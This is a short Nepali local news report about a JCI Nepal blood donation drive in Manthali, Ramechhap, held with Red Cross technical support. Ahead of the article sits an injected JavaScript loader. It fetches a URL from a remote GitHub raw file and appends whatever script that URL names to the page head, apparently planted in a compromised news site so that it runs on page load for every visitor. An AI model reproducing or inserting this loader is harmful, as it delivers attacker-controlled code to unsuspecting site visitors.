;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ २६,
रामेछाप । मानवताको सेवा नै जीवनको सर्वोतम कार्य हो भन्ने मूल नाराका साथ नेपाल जेसिजले सदरमुकाम मन्थलीमा रक्तादान कार्यक्रम गरेको छ । शुक्रबार (आज) जेसिजले सप्ताह २०२० तेस्रो दिनमा जेसिजले बृहत रक्तदान कार्यक्रम गरेको हो ।
उक्त कार्यक्रममा जिल्लाका विभिन्न २५ जनाले रक्तदान गरेका छन् । कोरोना भाइरस संक्रमणबाट प्रभावित भएर हाल देशैभरि रगत अभाव भएको अवस्थालाई मध्यनजर गरि जेसिजले सहयोग स्वरुप रक्तदान गरेको हो । विभिन्न समयमा सामाजिक कार्य गर्दै आएको जेसिजले सो कार्या गरेको हो ।
नेपाल रेड्क्रस् सोसाइटीको प्रविधिक सहयोगमा शाखाको कार्यालयमा कार्यक्रम सम्पन्न भएको हो ।
फेसबुक प्रतिक्रियाहरु